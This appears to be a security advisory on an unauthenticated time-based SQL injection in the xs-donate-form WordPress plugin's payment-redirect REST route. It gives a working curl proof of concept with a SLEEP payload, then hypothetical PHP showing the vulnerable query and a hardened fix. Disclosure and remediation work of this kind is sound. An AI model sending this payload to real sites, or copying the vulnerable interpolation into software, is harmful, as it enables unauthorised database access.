The plugin does not sanitise and escape the id parameter before using it in a SQL statement via one of its REST routes (payment-redirect), leading to an SQL injection exploitable by unauthenticated users. The proof of concept below delivers the payload in the JSON body of a GET request; on a vulnerable site the response is delayed by roughly five seconds (time-based blind injection).
curl 'https://example.com/index.php?rest_route=/xs-donate-form/payment-redirect/3' \
--data '{"id": "(SELECT 1 FROM (SELECT(SLEEP(5)))me)", "formid": "1", "type": "online_payment"}' \
-X GET \
-H 'Content-Type: application/json'
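The vulnerable pattern behind this class of bug, and the corresponding fix, as an added illustration written for this page (hypothetical code, not the xs-donate-form plugin's own source; the table name xsdf_payments, the callback names and the column names are assumptions). Note that a numeric regex on the path segment alone is not enough: WP_REST_Request::get_param() merges parameters with JSON body values taking precedence over URL segments, which is exactly why the PoC can supply a string id in the body while the path carries "3". Declaring the parameters in the route's args (so validation and sanitisation run on the merged value before the callback executes) and binding them with $wpdb->prepare() closes both gaps.

```php
<?php
// Hypothetical illustration of the bug class, not the plugin's real code.

// VULNERABLE: the request parameter is interpolated straight into SQL.
// A body such as {"id": "(SELECT 1 FROM (SELECT(SLEEP(5)))me)"} becomes
// part of the query text and the database stalls for five seconds.
function xsdf_hypothetical_vulnerable( WP_REST_Request $request ) {
    global $wpdb;
    $id     = $request->get_param( 'id' );     // JSON body wins over the URL segment
    $formid = $request->get_param( 'formid' );
    $row = $wpdb->get_row(
        "SELECT * FROM {$wpdb->prefix}xsdf_payments WHERE id = {$id} AND form_id = {$formid}"
    );
    return rest_ensure_response( $row );
}

// HARDENED: declare the arguments so non-numeric input is rejected with a
// 400 before the callback runs, then bind the values with prepare().
add_action( 'rest_api_init', function () {
    $numeric_arg = array(
        'required'          => true,
        'validate_callback' => function ( $value ) {
            return is_numeric( $value );
        },
        'sanitize_callback' => 'absint',
    );

    register_rest_route( 'xs-donate-form', '/payment-redirect/(?P<id>\d+)', array(
        'methods'             => WP_REST_Server::READABLE,
        'callback'            => 'xsdf_hypothetical_hardened',
        'permission_callback' => '__return_true', // route is intentionally public
        'args'                => array(
            'id'     => $numeric_arg,
            'formid' => $numeric_arg,
            'type'   => array(
                'required'          => true,
                'sanitize_callback' => 'sanitize_key',
            ),
        ),
    ) );
} );

function xsdf_hypothetical_hardened( WP_REST_Request $request ) {
    global $wpdb;
    // Already validated and cast by the args declaration; cast again so the
    // function is safe even if called outside the REST dispatcher.
    $id     = (int) $request->get_param( 'id' );
    $formid = (int) $request->get_param( 'formid' );

    // %d placeholders: the values can never be parsed as SQL syntax.
    $row = $wpdb->get_row(
        $wpdb->prepare(
            "SELECT * FROM {$wpdb->prefix}xsdf_payments WHERE id = %d AND form_id = %d",
            $id,
            $formid
        )
    );

    if ( null === $row ) {
        return new WP_Error( 'xsdf_not_found', 'Payment not found', array( 'status' => 404 ) );
    }
    return rest_ensure_response( $row );
}
```

With the hardened route in place, the PoC request above is answered with a rest_invalid_param error because the merged id value is not numeric, and even a value that slips past validation is only ever bound as an integer by prepare().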